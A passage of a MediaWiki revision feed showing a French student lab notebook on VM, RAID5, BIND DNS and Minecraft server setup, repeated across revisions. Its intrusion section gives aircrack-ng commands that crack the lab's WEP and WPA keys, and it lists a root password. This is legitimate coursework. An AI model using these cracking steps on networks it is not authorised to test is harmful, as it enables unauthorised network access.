/dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
mount -a&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60250</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60250"/>
				<updated>2022-11-28T23:01:22Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sécurisation des données - RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
apt install mdadm&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
/dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
mount -a&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60249</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60249"/>
				<updated>2022-11-28T23:00:50Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
